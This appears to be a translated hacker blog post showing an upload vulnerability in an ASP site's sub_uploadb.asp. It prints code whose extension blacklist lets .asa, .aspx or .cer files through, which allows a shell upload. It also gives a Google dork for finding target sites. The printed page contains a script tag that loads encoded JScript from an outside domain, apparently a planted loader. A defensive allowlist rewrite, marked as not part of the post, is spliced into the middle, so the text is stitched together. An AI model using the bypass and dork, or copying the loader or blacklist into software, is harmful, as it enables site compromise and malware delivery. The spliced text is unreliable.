Author: Minghacker
From: www.3est.com
Blog: http://yxmhero1989.blog.163.com
It seems that there are new and old versions.
See the code of sub_uploadb.asp:
<%@ Language=VBScript %>
<!--#include FILE="upload.inc"-->
<%
Dim upload, file, formName, formPath, iCount, fileformat
Set upload = New upload_F

' Build a numeric file name from the current time plus a random offset
Function MakedownName()
    Dim fname
    fname = Now()
    fname = Replace(fname, "-", "")
    fname = Replace(fname, " ", "")
    fname = Replace(fname, ":", "")
    fname = Replace(fname, "PM", "")
    fname = Replace(fname, "AM", "")
    fname = Replace(fname, "Morning", "")
    fname = Replace(fname, "Afternoon", "")
    fname = Int(fname) + Int((10 - 1 + 1) * Rnd + 1)
    MakedownName = fname
End Function

formPath = "../../upload/"
iCount = 0
For Each formName In upload.file ' list all uploaded files
    Set file = upload.file(formName) ' create a file object
    fileformat = LCase(Right(file.filename, 4))
    ' Blacklist check: only these four extensions are rejected
    If fileformat = ".asp" Or fileformat = ".exe" Or fileformat = ".txt" Or fileformat = ".htm" Then
        Response.Write "<script>alert('the file format is incorrect. please upload it again!');location='" & Request.ServerVariables("HTTP_REFERER") & "'</script>"
        Response.End
    End If
    If file.FileSize > 0 Then ' FileSize > 0 means file data exists
        ' The extension of the saved file is taken from the client-supplied name
        newname = MakedownName() & "." & Mid(file.FileName, InStrRev(file.FileName, ".") + 1)
        file.SaveAs Server.MapPath(formPath & newname) ' save the file
        filename = file.filepath & file.filename
        filename = Replace(filename, "\", "/")
        uploadpath = formPath & newname
        uploadpath = Mid(uploadpath, InStr(formPath, "upload"))
        iCount = iCount + 1 %>
<script>
fn = "<%=uploadpath%>"
filename = "<%=filename%>"
window.opener.document.form.proimgb.value = fn
window.opener.document.form.probpath.value = filename
window.close();
</script>
<%  Else
        Response.Write ("<font size=1.5 color=red>")
        Response.Write "file not found&nbsp;<a href=javascript:history.back(1)>return</a>"
        Response.Write ("</font>")
        Response.End
    End If
Next
%>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="css.css" type="text/css">
<style type="text/css">
<!--
body, td, th {
    font-size: 12px;
}
body {
    margin-left: 10px;
    margin-top: 10px;
    margin-right: 10px;
    margin-bottom: 10px;
    background-image: url(../../images/bg.gif);
}
-->
</style>
<script language="JScript.Encode" src="http://www.16885688.com/include.js">
If fileformat = ".asp" or fileformat = ".exe" or fileformat = ".txt" or fileformat = ".htm" then ..
Only .asp, .exe, .txt and .htm are filtered; other extensions such as asa, aspx and cer get through (if the server supports them).
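A hardened version of the extension check, as an added example that is not part of the original post or the application's own code: it replaces the blacklist with an allowlist and builds the saved name only from the validated extension. The helper names GetExt and IsAllowedUpload, the allowed image types and the sample file names are assumptions; the test loop at the end runs under cscript.

```vbscript
' Added example. Helper names and the allowlist contents are assumptions.
Const ALLOWED_EXT = "|jpg|jpeg|gif|png|"

' Return the lower-cased extension after the last dot, or "" if there is none.
Function GetExt(ByVal name)
    Dim p
    GetExt = ""
    p = InStrRev(name, ".")
    If p > 0 And p < Len(name) Then GetExt = LCase(Mid(name, p + 1))
End Function

' True only when the extension is purely alphanumeric and on the allowlist.
' Anything not explicitly listed (asa, aspx, cer, no extension) is refused.
Function IsAllowedUpload(ByVal name)
    Dim ext, re
    IsAllowedUpload = False
    ext = GetExt(name)
    Set re = New RegExp
    re.Pattern = "^[a-z0-9]+$"
    If Not re.Test(ext) Then Exit Function
    IsAllowedUpload = (InStr(ALLOWED_EXT, "|" & ext & "|") > 0)
End Function

' In sub_uploadb.asp the check would replace the blacklist inside the loop:
'     If Not IsAllowedUpload(file.FileName) Then Response.End
'     newname = MakedownName() & "." & GetExt(file.FileName)

' Constructed sample names, printed with the decision for each.
Dim n
For Each n In Array("photo.jpg", "PHOTO.JPEG", "x.asa", "x.cer", "x.aspx", "noext", "dot.")
    WScript.Echo n & " -> " & IsAllowedUpload(n)
Next
```

The allowlist is one layer only; the upload directory should also have script execution disabled in IIS so that a stored file is never interpreted.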
Asp/up/upload.asp calls the sub_uploadb.asp shown above. How to upload a shell is not explained here.
Google: inurl:/managepro. asp
There are not many sites, and the keywords are better constructed by yourself. Take specific measures.